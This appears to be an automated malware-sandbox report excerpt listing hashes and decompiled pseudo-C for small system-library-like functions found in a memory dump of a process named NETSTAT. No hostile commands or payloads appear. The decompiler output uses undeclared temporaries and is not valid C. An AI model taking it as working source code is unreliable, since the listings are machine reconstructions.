Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f73d7fd5e9676701229e6734c3bb17b7088a2a087b95663c3c032c111589f20
Instruction ID: 4e9a426519f009bbaa9d00685ff44e33fc6ecae06def0b1e63fdc60bc69de0ad
Opcode Fuzzy Hash: 1f73d7fd5e9676701229e6734c3bb17b7088a2a087b95663c3c032c111589f20
Instruction Fuzzy Hash: 1C019271E40218AFCB10DFA8D941EAFB7B8EF45700F004056B905EB281D670EE00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02F214FB, Relevance: .0, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E02F214FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x2f5d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E02EAFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E02E87D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E02EAB640(E02EA9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x02f214fb
0x02f214fb
0x02f2150a
0x02f21514
0x02f21519
0x02f2151b
0x02f21526
0x02f2152c
0x02f21534
0x02f21537
0x02f2153a
0x02f21545
0x02f21557
0x02f21547
0x02f21550
0x02f21550
0x02f21562
0x02f21563
0x02f21565
0x02f2156a
0x02f2157f

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4edd049d26a89c70e1ef6bd10b9d3a4f07c649078b1504b39e4ccd3da1896b20
Instruction ID: 9bca3f4d037904406c2cd4c2649e45c2f7450da925fbf29d142f7e4857f7a468
Opcode Fuzzy Hash: 4edd049d26a89c70e1ef6bd10b9d3a4f07c649078b1504b39e4ccd3da1896b20
Instruction Fuzzy Hash: 5C019275A4125CAFCB10DFA8D842EAEB7B8EF45700F004056F919EB381D670EA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02E658EC, Relevance: .0, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E02E658EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x2f5d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x2e45c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E02E65943() != 0 &&  *0x2f55320 > 5) {
					E02EE7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E02EE7B5E( &_v28, _t28);
					_t11 = E02EE7B9C(0x2f55320, 0x2e4bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E02EAB640(_t11, _t17, _v8 ^ _t29, 0x2e4bf15, _t27, _t28);
			}

0x02e658fb
0x02e658fe
0x02e65906
0x02e6590a
0x02e6593c
0x02e6593c
0x02e6590c
0x02e6590c
0x02e65911
0x00000000
0x02e65913
0x02e65913
0x02e65913
0x02e65911
0x02e6591d
0x02ec1035
0x02ec103c
0x02ec103f
0x02ec1056
0x02ec1056
0x02e6593b

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac07a33976de494ba1e06835c3f4731abddb4d85fee76065f0eba147aea63345
Instruction ID: 7330d181f9ddd84682c5afba4537aaa1d463b8c4d12711306d07abcdf3f34fe2
Opcode Fuzzy Hash: ac07a33976de494ba1e06835c3f4731abddb4d85fee76065f0eba147aea63345
Instruction Fuzzy Hash: 0801A731BD05189BCB14DB69D815ABFB7AAEF402B4FD590A9A9169B240DE30ED01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 02F31074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F31074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E02F3165E(__ebx, 0x2f58ae4, (__edx -  *0x2f58b04 >> 0x14) + (__edx -  *0x2f58b04 >> 0x14), __edi, __ecx, (__edx -  *0x2f58b04 >> 0x14) + (__edx -  *0x2f58b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E02F2AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E02E87D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E02F1FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x02f31074
0x02f31080
0x02f31082
0x02f3108a
0x02f3108f
0x02f31093
0x02f310ab
0x02f310ab
0x02f310c3
0x02f310cf
0x02f310e1
0x02f310d1
0x02f310da
0x02f310da
0x02f310e9
0x02f310f5
0x02f310f5
0x02f310fe

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bbb2a49b0053e6506bea9d483f198fac1884db2376daccc0d5a57879712af79
Instruction ID: da4def3506eb7913dab71ef2a1fc9a81ed050dc44561690c0827a7ecbffbfcf1
Opcode Fuzzy Hash: 5bbb2a49b0053e6506bea9d483f198fac1884db2376daccc0d5a57879712af79
Instruction Fuzzy Hash: AE012872504741ABC711EB68C900B1BB7D6AB84794F04C619FA8993690EE30D450CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 02E7B02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E7B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E02E87D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E02EE7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x02e7b037
0x02e7b039
0x02e7b03b
0x02e7b040
0x02eca60e
0x00000000
0x00000000
0x02eca61d
0x02e7b04b
0x02e7b04e
0x02eca627
0x02eca634
0x00000000
0x00000000
0x02eca641
0x02eca653
0x02eca643
0x02eca64c
0x02eca64c
0x02eca65b
0x00000000
0x00000000
0x00000000
0x02eca66c
0x02e7b057
0x02e7b057
0x02e7b057
0x02e7b046
0x02e7b046
0x00000000

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: 11d7268033886074e6e85cc38c2e6e51a8b95160e9a30ba5f4fbc33b9f5162e2
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 29017C72280984DFD322AB9CC988F6677D8EF46758F1990A9F919CBB91D728DC41C620

Uniqueness

Uniqueness Score: -1.00%

Function 02F1FEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E02F1FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x2f5d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E02EAFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E02E87D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E02EAB640(E02EA9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x02f1fec0
0x02f1fec0
0x02f1fecf
0x02f1fed9
0x02f1fede
0x02f1fee0
0x02f1feeb
0x02f1fef3
0x02f1fef6
0x02f1fef9
0x02f1ff04
0x02f1ff16
0x02f1ff06
0x02f1ff0f
0x02f1ff0f
0x02f1ff21
0x02f1ff22
0x02f1ff24
0x02f1ff29
0x02f1ff3e

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc948b08a9900ae57899a6c5cd1a2275b33990b54cda9118355280069b435516
Instruction ID: 030d7f6b6941f2614f2ee6ecd5d2f9f89c683fd372e374a2aa0b2c14756a0037
Opcode Fuzzy Hash: dc948b08a9900ae57899a6c5cd1a2275b33990b54cda9118355280069b435516
Instruction Fuzzy Hash: EF018471E4121CABDB14DBA9D845FAEB7B8EF45700F404166FA05AB290EA70EA01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02F1FE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E02F1FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x2f5d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E02EAFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E02E87D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E02EAB640(E02EA9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x02f1fe3f
0x02f1fe3f
0x02f1fe4e
0x02f1fe58
0x02f1fe5d
0x02f1fe5f
0x02f1fe6a
0x02f1fe72
0x02f1fe75
0x02f1fe78
0x02f1fe83
0x02f1fe95
0x02f1fe85
0x02f1fe8e
0x02f1fe8e
0x02f1fea0
0x02f1fea1
0x02f1fea3
0x02f1fea8
0x02f1febd

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00f010d6bd52836191e6e13553c5ffb446b5d2bce601d81d2de8910de3f7a5a4
Instruction ID: 9ea1c030e948042041f535d66aa149edaae868026ed2195b0cea97218ca8085d
Opcode Fuzzy Hash: 00f010d6bd52836191e6e13553c5ffb446b5d2bce601d81d2de8910de3f7a5a4
Instruction Fuzzy Hash: E0018471E41318ABDB14DFA9D855FAEB7B9EF44704F008066B905AB291DA70E901CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02F38A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E02F38A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x2f5d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E02E87D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E02EAB640(E02EA9AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x02f38a62
0x02f38a71
0x02f38a79
0x02f38a82
0x02f38a85
0x02f38a89
0x02f38a8c
0x02f38a8f
0x02f38a92
0x02f38a95
0x02f38a9f
0x02f38ab1
0x02f38aa1
0x02f38aaa
0x02f38aaa
0x02f38abc
0x02f38abd
0x02f38abf
0x02f38ac4
0x02f38ada

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a3a11800e5f49ec9b6ce3428b08658211dbb3e2b5a182ec0f2e85ff093b454d
Instruction ID: 619b702f813294b2364922db5f3be26bbcc98d94c109bd1189f4ed192d5c5a57
Opcode Fuzzy Hash: 9a3a11800e5f49ec9b6ce3428b08658211dbb3e2b5a182ec0f2e85ff093b454d
Instruction Fuzzy Hash: 7A012C71A4121CAFCB01DFA9D9419AEB7B8EF49350F10405AFA05EB381E634A900CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F38ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E02F38ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x2f5d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E02E87D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E02EAB640(E02EA9AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x02f38ed6
0x02f38ee5
0x02f38eed
0x02f38ef0
0x02f38efa
0x02f38f03
0x02f38f0c
0x02f38f15
0x02f38f24
0x02f38f27
0x02f38f31
0x02f38f43
0x02f38f33
0x02f38f3c
0x02f38f3c
0x02f38f4e
0x02f38f4f
0x02f38f51
0x02f38f56
0x02f38f69

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32a7621aee0758e5d0749429a5b7440fed50e50d9cc4678a2459143776e64935
Instruction ID: 7e06e14cd19d246aa001655cfe475d152a4763b7a1b043ddc7571c59c5e70472
Opcode Fuzzy Hash: 32a7621aee0758e5d0749429a5b7440fed50e50d9cc4678a2459143776e64935
Instruction Fuzzy Hash: 09110C70E402199FDB04DFA8D541AAEF7F4BB08300F1482AAE519EB382E6349940CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02E6DB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E6DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E02E6DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E02E6E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L02E6E8B0(__ecx, _t14, 0xfff);
							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x02e6db64
0x02e6db66
0x02e6db6b
0x02e6dbaa
0x02e6db71
0x02e6db76
0x02e6db7a
0x02e6dba3
0x02e6db7c
0x02e6db87
0x02e6db8b
0x02ec4fa1
0x02ec4fb3
0x02ec4fb8
0x02e6db91
0x02e6db96
0x02e6db98
0x02e6db98
0x02e6db8b
0x02e6db7a
0x02e6db9d
0x02e6dba2

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: af8683711faeafc2cb0654779c907dda4487809b494d49c20c5e87693fbe305d
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: E6F0C8333C15639BD3326A558CACFB7A6968F82AE4F199035B2059B248CA608C02CAD0

Uniqueness

Uniqueness Score: -1.00%

Function 02E6B1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02E6B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E02E87D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E02E87D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E02EE7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x02e6b1e8
0x02e6b1ea
0x02e6b1f3
0x02ec4a17
0x02e6b1f9
0x02e6b1f9
0x02e6b1f9
0x02e6b201
0x02ec4a21
0x02ec4a2e
0x00000000
0x00000000
0x02ec4a3b
0x02ec4a4d
0x02ec4a3d
0x02ec4a46
0x02ec4a46
0x02ec4a55
0x00000000
0x00000000
0x00000000
0x02e6b20a
0x02e6b20a
0x02e6b20a
0x02e6b20a

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: 72c2e2e85879ff52c7a5d8facaee39faf6d18a10958f4c1710e64b8f4f537f26
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 1D01D6326C0580DBD7229799C908F69BBD9EF4279CF18A065F918DB6F1E774C801D614

Uniqueness

Uniqueness Score: -1.00%

Function 02EFFE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E02EFFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x2f5d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E02E87D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E02EAB640(E02EA9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x02effe96
0x02effe9e
0x02effea1
0x02effead
0x02effeb3
0x02effeb9
0x02effec3
0x02effed5
0x02effec5
0x02effece
0x02effece
0x02effee0
0x02effee1
0x02effee3
0x02effee8
0x02effefb

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac6992fa0aa505ad47f8d7a9d93405005c91450ce8e98f6f595cad555873b065
Instruction ID: 6f7d1ae4d2df9886b981e01f5a7268f7f2ff015a64e270c3d8ee0bf05e8c55c2
Opcode Fuzzy Hash: ac6992fa0aa505ad47f8d7a9d93405005c91450ce8e98f6f595cad555873b065
Instruction Fuzzy Hash: D3016270A4020CEFCB14DFA8D541A6EB7F4EF04304F109199B919DF382E635E901CB40

Uniqueness

Uniqueness Score: -1.00%

Function 02F2131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E02F2131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x2f5d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E02E87D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E02EAB640(E02EA9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x02f2131b
0x02f2132a
0x02f21330
0x02f21336
0x02f2133e
0x02f21341
0x02f21344
0x02f2134f
0x02f21361
0x02f21351
0x02f2135a
0x02f2135a
0x02f2136c
0x02f2136d
0x02f2136f
0x02f21374
0x02f21387

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c4620011cd2cb8f24381ff85df2de00ae894b3345bc2d5740c804d5883979d1
Instruction ID: a175cc40565855cf156bb537bd408e2d20ec739d0150213a2c78ed8d175cec22
Opcode Fuzzy Hash: 7c4620011cd2cb8f24381ff85df2de00ae894b3345bc2d5740c804d5883979d1
Instruction Fuzzy Hash: A4018171E0125CAFCB00EFA8D505AAEB7F5FF08300F008059B909EB381E630AA00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 02F38F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E02F38F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x2f5d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E02E87D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E02EAB640(E02EA9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x02f38f6a
0x02f38f79
0x02f38f81
0x02f38f84
0x02f38f8b
0x02f38f91
0x02f38f94
0x02f38f9e
0x02f38fb0
0x02f38fa0
0x02f38fa9
0x02f38fa9
0x02f38fbb
0x02f38fbc
0x02f38fbe
